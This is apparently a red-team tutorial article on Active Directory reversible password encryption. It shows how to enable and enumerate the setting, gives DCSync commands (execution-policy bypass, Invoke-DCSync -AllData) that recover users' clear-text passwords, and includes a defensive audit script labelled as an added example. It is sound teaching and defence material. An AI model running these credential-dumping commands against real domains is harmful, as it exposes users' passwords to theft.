Introduction
According to MITRE, an adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption property specifies whether reversible password encryption is enabled or disabled for an account. By default this property is disabled (credentials are instead stored as the output of one-way hashing functions) and it should not be enabled unless legacy or other software requires it.
· MITRE Tactic: Credential Dumping (ID: TA0006)
· MITRE Technique: Modify Authentication Process (T1556)
· MITRE Sub-technique ID: Reversible Encryption (T1556.005)
When reversible encryption is enabled on a domain user account, the encrypted data stored on the Domain Controller can be reversed back to the user's password. A password stored under the reversible encryption policy is not a hash, since a function can be called to recover the original clear-text password.
Do you know?
As per Microsoft: if you use the Challenge Handshake Authentication Protocol (CHAP) through remote access or Internet Authentication Services (IAS), you must enable this policy setting. CHAP is an authentication protocol that is used by remote access and network connections. Digest Authentication in Internet Information Services (IIS) also requires that you enable this policy setting.
Table of Contents
· Lab Setup
· DC-Sync Attack: Dump Plain Text Password
· Mitigation
· Conclusion
Lab Setup
Enabling reversible encryption for Active Directory users
There are multiple methods to enable the reversible encryption property:
1) User Account Property
Enable reversible encryption by modifying the account property of the domain user account.
2) PowerShell Command
Set-ADUser requires the target account as -Identity; replace the placeholder with the user's sAMAccountName:
Set-ADUser -Identity <sAMAccountName> -AllowReversiblePasswordEncryption $true
3) Group Policy Management
Enable "Store passwords using reversible encryption" under Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy\
Validate the property through the user's properties, Attribute Editor tab, on the userAccountControl attribute.
NOTE: The reversible form is only stored when a password is set, so if the system administrator now resets the password for the user account, an adversary may be able to obtain the plaintext of passwords created or changed after the property was enabled.
Enumeration
PowerShell command to find users with AllowReversiblePasswordEncryption enabled:
Get-ADUser -Filter {AllowReversiblePasswordEncryption -eq $true} | Select-Object Name, sAMAccountName
Attack: DC-Sync
In our previous article we described the DCSync attack; read more here.
You can download the DCSync script tool here.
Commands to execute on the domain controller to check the user's clear-text password:
powershell.exe -ep bypass
Import-Module .\Invoke-DCSync.ps1
Invoke-DCSync -AllData
DCSync shows the clear-text password of target user.
Mitigation
- Ensure that the Allow Reversible Password Encryption property is set to disabled.
- Ensure that the Group Policy setting "Store passwords using reversible encryption" is set to disabled.
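The enumeration and mitigation steps above, combined into one audit script. This is an added example, not from the original article: it assumes the RSAT ActiveDirectory module and rights to read and modify the user objects, and the function names are illustrative. It goes slightly beyond the page by also checking the domain and fine-grained password policies, and by forcing a password change, since an already-stored reversible password remains until the account's password is next changed.

```powershell
# Added example (not the original article's code). Requires the ActiveDirectory
# module (RSAT) and permission to read/modify the audited user objects.
Import-Module ActiveDirectory

# ENCRYPTED_TEXT_PWD_ALLOWED bit of userAccountControl; Get-ADUser exposes it
# as the AllowReversiblePasswordEncryption property.
$UF_ENCRYPTED_TEXT_PWD_ALLOWED = 0x80

function Get-ReversibleEncryptionUsers {
    # LDAP bitwise-AND matching rule selects accounts with the flag set directly
    $ldap = "(&(objectCategory=person)(objectClass=user)" +
            "(userAccountControl:1.2.840.113556.1.4.803:=$UF_ENCRYPTED_TEXT_PWD_ALLOWED))"
    Get-ADUser -LDAPFilter $ldap -Properties userAccountControl, pwdLastSet |
        Select-Object Name, sAMAccountName, DistinguishedName,
            @{ n = 'PwdLastSet'; e = { [DateTime]::FromFileTime($_.pwdLastSet) } }
}

function Test-ReversibleEncryptionPolicy {
    # ReversibleEncryptionEnabled mirrors the GPO setting
    # "Store passwords using reversible encryption"
    $domainPolicy = Get-ADDefaultDomainPasswordPolicy
    $fgpp = Get-ADFineGrainedPasswordPolicy -Filter * |
        Where-Object { $_.ReversibleEncryptionEnabled -eq $true }
    [PSCustomObject]@{
        DomainPolicyEnabled   = $domainPolicy.ReversibleEncryptionEnabled
        FineGrainedPoliciesOn = @($fgpp | Select-Object -ExpandProperty Name)
    }
}

function Disable-ReversibleEncryption {
    param([Parameter(ValueFromPipeline = $true)] $User)
    process {
        # Clearing the flag alone leaves the currently stored reversible
        # password in place, so also require a change at next logon.
        Set-ADUser -Identity $User.DistinguishedName -AllowReversiblePasswordEncryption $false
        Set-ADUser -Identity $User.DistinguishedName -ChangePasswordAtLogon $true
    }
}

# Audit: list exposed accounts and the policy state
$exposed = Get-ReversibleEncryptionUsers
$exposed | Format-Table -AutoSize
Test-ReversibleEncryptionPolicy

# Remediate: uncomment after reviewing the list above
# $exposed | Disable-ReversibleEncryption
```

Accounts that genuinely need reversible encryption (the CHAP and Digest cases quoted from Microsoft above) should be excluded from the remediation pipeline before it is run.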
Conclusion
In this article, we were able to recover the clear-text passwords of Active Directory user accounts that had reversible encryption enabled. This article can serve as a reference for Red Team activities covering Credential Dumping: Active Directory Plain Text Password.